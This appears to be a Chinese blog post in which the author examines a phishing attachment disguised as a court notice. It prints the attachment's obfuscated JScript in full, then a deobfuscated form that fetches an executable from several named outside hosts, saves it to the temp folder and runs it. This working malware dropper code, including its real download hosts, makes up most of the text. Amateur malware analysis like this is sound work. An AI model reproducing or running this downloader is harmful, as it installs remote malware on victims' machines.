@3013216027
2016-01-23T10:31:16.000000Z
字数 14362
阅读 1226
这是啥?
tmp
最近连续收到大概10封电子邮件,内容或者是说劳资欠款了,或者是要我去法院玩耍了。还尼玛带一个小小的诡异的附件。窝决定看一下是个啥...
->邮件截图
附件解压后是Court_Notification_00000681198.doc.js
你说你后缀这么迷惑人显然并没有什么好东西,,傻逼才会打开看呀o.o
但是窝打开看了...
var stroke="5556575E535257505454505C572415154A070B09";function a154() { return 'xa'; }; function a221() { return '9251'; }; function a167() { return 'y {'; }; function a140() { return 'Res'; }; function a121() { return 'r xa '; }; function a84() { return 'r x'; }; function a58() { return 'P%'; }; function a78() { return '+".ex'; }; function a175() { return '{};'; }; function a71() { return '(M'; }; function a129() { return 'ream'; }; function a54() { return 'Stri'; }; function a65() { return '92'; }; function a108() { return '.re'; }; function a185() { return '"GET'; }; function a38() { return ' Acti'; }; function a181() { return ' try'; }; function a0() { return 'eval'; }; function a150() { return '0) '; }; function a139() { return 'e(xo.'; }; function a45() { return '"); '; }; function a118() { return ' 2'; }; function a5() { return ') {'; }; function a119() { return '00) {'; }; function a217() { return ' 1) b'; }; function a100() { return 'hang'; }; function a143() { return 'dy); '; }; function a194() { return 'ent.'; }; function a93() { return 'ML'; }; function a174() { return '(er) '; }; function a25() { return ' fo'; }; function a161() { return 'eToF'; }; function a153() { return ' 1; '; }; function a227() { return '13)'; }; function a81() { return 'dn'; }; function a212() { return 'er) '; }; function a51() { return 'Envi'; }; function a102() { return 'unct'; }; function a144() { return 'if'; }; function a218() { return 'reak;'; }; var av = ''; function a8() { return ' "so'; }; function a188() { return '//"'; }; function a198() { return '"+fr'; }; function a43() { return 'ript.'; }; function a21() { return 'pl'; }; function a66() { return ')+M'; }; function a77() { return '00)'; }; function a64() { return 'ode('; }; function a127() { return '"ADOD'; }; function a186() { return '","'; }; function a165() { return ',2);'; }; function a42() { return 'WSc'; }; function a52() { return 'ro'; }; function a74() { return 'om()'; }; function a26() { return 'r (v'; }; function a128() { return 'B.St'; }; function a177() { return 'xa.c'; }; function a29() { return ' i<'; }; function a103() { return 'io'; }; function a195() { return 'ph'; }; function a28() { return '=0;'; }; function a190() { return ']+"'; }; function a46() { return 'var'; }; function a224() { return '65'; }; function a2() { return 'ction'; }; function a159() { return 'a.s'; }; function a170() { return ',1'; }; function a105() { return ') {'; }; function a207() { return '()'; }; function a126() { return 'ject('; }; function a94() { return 'HTT'; }; function a17() { return 'cured'; }; function a13() { return '9.11'; }; function a155() { return '.posi'; }; function a168() { return ' ws.R'; }; function a95() { return 'P"); '; }; function a36() { return '= '; }; function a53() { return 'nment'; }; function a24() { return ');'; }; function a160() { return 'av'; }; function a208() { return '; }'; }; function a62() { return 'omCha'; }; function a27() { return 'ar i'; }; function a135() { return 'pe = '; }; function a192() { return 'oc'; }; function a206() { return 'send'; }; function a151() { return '{ d'; }; function a83() { return '0; va'; }; function a3() { return ' d'; }; function a211() { return 'ch ('; }; function a112() { return ' &'; }; function a16() { return 'se'; }; function a156() { return 'ti'; }; function a50() { return 'xpand'; }; function a163() { return 'e('; }; function a226() { return 'l(39'; }; function a204() { return 'se);'; }; function a92() { return '2.X'; }; function a182() { return ' { x'; }; function a113() { return '& '; }; function a9() { return 'flec'; }; function a162() { return 'il'; }; function a166() { return ' tr'; }; function a152() { return 'n ='; }; function a80() { return 'var '; }; function a179() { return '); '; }; function a141() { return 'po'; }; function a48() { return 'n = '; }; function a117() { return 'us =='; }; function a60() { return 'Stri'; }; function a76() { return '000'; }; function a183() { return 'o.op'; }; function a131() { return 'a.ope'; }; function a40() { return 'bject'; }; function a114() { return 'xo.'; }; function a101() { return 'e = f'; }; function a147() { return '.siz'; }; function a90() { return 'ct("'; }; function a14() { return '5.1'; }; function a201() { return 'str'; }; function a44() { return 'Shell'; }; function a35() { return ' ws '; }; function a12() { return '23'; }; function a39() { return 'veXO'; }; function a55() { return 'ng'; }; function a191() { return '/d'; }; function a209() { return ' c'; }; function a213() { return '{};'; }; function a169() { return 'un(fn'; }; function a111() { return ' == 4'; }; function a210() { return 'at'; }; function a1() { return 'fun'; }; function a96() { return 'xo.'; }; function a69() { return 'ou'; }; function a37() { return 'new'; }; function a203() { return ' fal'; }; function a215() { return '(dn '; }; function a34() { return ' var'; }; function a106() { return ' if ('; }; function a124() { return 'ti'; }; function a222() { return '); '; }; function a157() { return 'on = '; }; function a99() { return 'atec'; }; function a11() { return ' 64.'; }; function a176() { return ' }; '; }; function a32() { return 'h; i'; }; function a110() { return 'State'; }; function a10() { return 't.com'; }; function a59() { return '")+'; }; function a125() { return 'veXOb'; }; function a115() { return 'st'; }; function a7() { return 'b ='; }; function a130() { return '"); x'; }; function a193() { return 'um'; }; function a98() { return 'adyst'; }; function a31() { return 'lengt'; }; function a47() { return ' f'; }; function a214() { return ' if '; }; function a67() { return 'at'; }; function a205() { return ' xo.'; }; function a20() { return '.s'; }; function a49() { return 'ws.E'; }; function a184() { return 'en('; }; function a68() { return 'h.r'; }; function a89() { return 'XObje'; }; function a4() { return 'l(fr'; }; function a172() { return '} ca'; }; function a15() { return '11 id'; }; function a109() { return 'ady'; }; function a225() { return '2); d'; }; function a33() { return '++) {'; }; function a91() { return 'MSXML'; }; function a158() { return '0; x'; }; function a220() { return '; dl('; }; function a57() { return '"%TEM'; }; function a228() { return ';'; }; function a223() { return 'dl(6'; }; function a164() { return 'fn'; }; function a56() { return 's('; }; function a63() { return 'rC'; }; function a178() { return 'lose('; }; function a202() { return 'oke,'; }; function a197() { return 'rnd='; }; function a120() { return ' va'; }; function a122() { return '= new'; }; function a149() { return ' 500'; }; function a145() { return ' ('; }; function a88() { return 'tive'; }; function a134() { return 'a.ty'; }; function a23() { return '(" "'; }; function a18() { return 'now'; }; function a137() { return ' xa.w'; }; function a148() { return 'e >'; }; function a138() { return 'rit'; }; function a171() { return ',0); '; }; function a87() { return ' Ac'; }; function a75() { return '*1000'; }; function a200() { return '="+'; }; function a180() { return '}; };'; }; function a22() { return 'it'; }; function a104() { return 'n('; }; function a146() { return 'xa'; }; function a216() { return '=='; }; function a116() { return 'at'; }; function a133() { return '); x'; }; function a85() { return 'o = n'; }; function a6() { return ' var '; }; function a97() { return 'onre'; }; function a196() { return 'p?'; }; function a107() { return 'xo'; }; function a199() { return '+"&id'; }; function a70() { return 'nd'; }; function a30() { return 'b.'; }; function a132() { return 'n('; }; function a189() { return '+b[i'; }; function a41() { return '("'; }; function a19() { return '.com"'; }; function a142() { return 'nseBo'; }; function a82() { return ' = '; }; function a219() { return ' } }'; }; function a79() { return 'e"; '; }; function a86() { return 'ew'; }; function a187() { return 'http:'; }; function a72() { return 'ath'; }; function a73() { return '.rand'; }; function a173() { return 'tch '; }; function a123() { return ' Ac'; }; function a61() { return 'ng.fr'; }; function a136() { return '1;'; }; for (var scf=1; scf<=228; scf++) { av += this['a'+scf](); } this[a0()](av);
压缩了回车o.o
简单地处理一下,大概还能看:
var stroke="5556575E535257505454505C572415154A070B09";function a154() { return 'xa';};function a221() { return '9251';};function a167() { return 'y {';};function a140() { return 'Res';};function a121() { return 'r xa ';};function a84() { return 'r x';};function a58() { return 'P%';};function a78() { return '+".ex';};function a175() { return '{};';};function a71() { return '(M';};function a129() { return 'ream';};function a54() { return 'Stri';};function a65() { return '92';};function a108() { return '.re';};function a185() { return '"GET';};function a38() { return ' Acti';};function a181() { return ' try';};function a0() { return 'eval';};function a150() { return '0) ';};function a139() { return 'e(xo.';};function a45() { return '");';};function a118() { return ' 2';};function a5() { return ') {';};function a119() { return '00) {';};function a217() { return ' 1) b';};function a100() { return 'hang';};function a143() { return 'dy);';};function a194() { return 'ent.';};function a93() { return 'ML';};function a174() { return '(er) ';};function a25() { return ' fo';};function a161() { return 'eToF';};function a153() { return ' 1;';};function a227() { return '13)';};function a81() { return 'dn';};function a212() { return 'er) ';};function a51() { return 'Envi';};function a102() { return 'unct';};function a144() { return 'if';};function a218() { return 'reak;';};var av = '';function a8() { return ' "so';};function a188() { return '//"';};function a198() { return '"+fr';};function a43() { return 'ript.';};function a21() { return 'pl';};function a66() { return ')+M';};function a77() { return '00)';};function a64() { return 'ode(';};function a127() { return '"ADOD';};function a186() { return '","';};function a165() { return ',2);';};function a42() { return 'WSc';};function a52() { return 'ro';};function a74() { return 'om()';};function a26() { return 'r (v';};function a128() { return 'B.St';};function a177() { return 'xa.c';};function a29() { return ' i<';};function a103() { return 'io';};function a195() { return 'ph';};function a28() { return '=0;';};function a190() { return ']+"';};function a46() { return 'var';};function a224() { return '65';};function a2() { return 'ction';};function a159() { return 'a.s';};function a170() { return ',1';};function a105() { return ') {';};function a207() { return '()';};function a126() { return 'ject(';};function a94() { return 'HTT';};function a17() { return 'cured';};function a13() { return '9.11';};function a155() { return '.posi';};function a168() { return ' ws.R';};function a95() { return 'P");';};function a36() { return '= ';};function a53() { return 'nment';};function a24() { return ');';};function a160() { return 'av';};function a208() { return ';}';};function a62() { return 'omCha';};function a27() { return 'ar i';};function a135() { return 'pe = ';};function a192() { return 'oc';};function a206() { return 'send';};function a151() { return '{ d';};function a83() { return '0;va';};function a3() { return ' d';};function a211() { return 'ch (';};function a112() { return ' &';};function a16() { return 'se';};function a156() { return 'ti';};function a50() { return 'xpand';};function a163() { return 'e(';};function a226() { return 'l(39';};function a204() { return 'se);';};function a92() { return '2.X';};function a182() { return ' { x';};function a113() { return '& ';};function a9() { return 'flec';};function a162() { return 'il';};function a166() { return ' tr';};function a152() { return 'n =';};function a80() { return 'var ';};function a179() { return ');';};function a141() { return 'po';};function a48() { return 'n = ';};function a117() { return 'us ==';};function a60() { return 'Stri';};function a76() { return '000';};function a183() { return 'o.op';};function a131() { return 'a.ope';};function a40() { return 'bject';};function a114() { return 'xo.';};function a101() { return 'e = f';};function a147() { return '.siz';};function a90() { return 'ct("';};function a14() { return '5.1';};function a201() { return 'str';};function a44() { return 'Shell';};function a35() { return ' ws ';};function a12() { return '23';};function a39() { return 'veXO';};function a55() { return 'ng';};function a191() { return '/d';};function a209() { return ' c';};function a213() { return '{};';};function a169() { return 'un(fn';};function a111() { return ' == 4';};function a210() { return 'at';};function a1() { return 'fun';};function a96() { return 'xo.';};function a69() { return 'ou';};function a37() { return 'new';};function a203() { return ' fal';};function a215() { return '(dn ';};function a34() { return ' var';};function a106() { return ' if (';};function a124() { return 'ti';};function a222() { return ');';};function a157() { return 'on = ';};function a99() { return 'atec';};function a11() { return ' 64.';};function a176() { return ' };';};function a32() { return 'h;i';};function a110() { return 'State';};function a10() { return 't.com';};function a59() { return '")+';};function a125() { return 'veXOb';};function a115() { return 'st';};function a7() { return 'b =';};function a130() { return '");x';};function a193() { return 'um';};function a98() { return 'adyst';};function a31() { return 'lengt';};function a47() { return ' f';};function a214() { return ' if ';};function a67() { return 'at';};function a205() { return ' xo.';};function a20() { return '.s';};function a49() { return 'ws.E';};function a184() { return 'en(';};function a68() { return 'h.r';};function a89() { return 'XObje';};function a4() { return 'l(fr';};function a172() { return '} ca';};function a15() { return '11 id';};function a109() { return 'ady';};function a225() { return '2);d';};function a33() { return '++) {';};function a91() { return 'MSXML';};function a158() { return '0;x';};function a220() { return ';dl(';};function a57() { return '"%TEM';};function a228() { return ';';};function a223() { return 'dl(6';};function a164() { return 'fn';};function a56() { return 's(';};function a63() { return 'rC';};function a178() { return 'lose(';};function a202() { return 'oke,';};function a197() { return 'rnd=';};function a120() { return ' va';};function a122() { return '= new';};function a149() { return ' 500';};function a145() { return ' (';};function a88() { return 'tive';};function a134() { return 'a.ty';};function a23() { return '(" "';};function a18() { return 'now';};function a137() { return ' xa.w';};function a148() { return 'e >';};function a138() { return 'rit';};function a171() { return ',0);';};function a87() { return ' Ac';};function a75() { return '*1000';};function a200() { return '="+';};function a180() { return '};};';};function a22() { return 'it';};function a104() { return 'n(';};function a146() { return 'xa';};function a216() { return '==';};function a116() { return 'at';};function a133() { return ');x';};function a85() { return 'o = n';};function a6() { return ' var ';};function a97() { return 'onre';};function a196() { return 'p?';};function a107() { return 'xo';};function a199() { return '+"&id';};function a70() { return 'nd';};function a30() { return 'b.';};function a132() { return 'n(';};function a189() { return '+b[i';};function a41() { return '("';};function a19() { return '.com"';};function a142() { return 'nseBo';};function a82() { return ' = ';};function a219() { return ' } }';};function a79() { return 'e";';};function a86() { return 'ew';};function a187() { return 'http:';};function a72() { return 'ath';};function a73() { return '.rand';};function a173() { return 'tch ';};function a123() { return ' Ac';};function a61() { return 'ng.fr';};function a136() { return '1;';};for (var scf=1; scf<=228; scf++) {av += this['a'+scf]();}this[a0()](av);
然后注释掉this[a0()](av),把它拼的代码导出,还是压缩的,还原了一部分回车后,简单格式化一下:
function dl(fr) {var b = "soflect.com 64.239.115.111 idsecurednow.com".split(" ");for (var i=0;i<b.length;i++) {var ws = new ActiveXObject("WScript.Shell");var fn = ws.ExpandEnvironmentStrings("%TEMP%")+String.fromCharCode(92)+Math.round(Math.random()*100000000)+".exe";var dn = 0;var xo = new ActiveXObject("MSXML2.XMLHTTP");xo.onreadystatechange = function() {if (xo.readyState == 4 && xo.status == 200) {var xa = new ActiveXObject("ADODB.Stream");xa.open();xa.type = 1;xa.write(xo.ResponseBody);if (xa.size > 5000) {dn = 1;xa.position = 0;xa.saveToFile(fn,2);try {ws.Run(fn,1,0);} catch (er) {};};xa.close();};};try {xo.open("GET","http://"+b[i]+"/document.php?rnd="+fr+"&id="+stroke, false);xo.send();} catch (er) {};if (dn == 1) break;} };dl(9251);dl(6652);dl(3913);
看起来是搞了个啥病毒之类的样子,而且是从服务器取下后才开始做事。。然后问题来了,它到底做了什么...
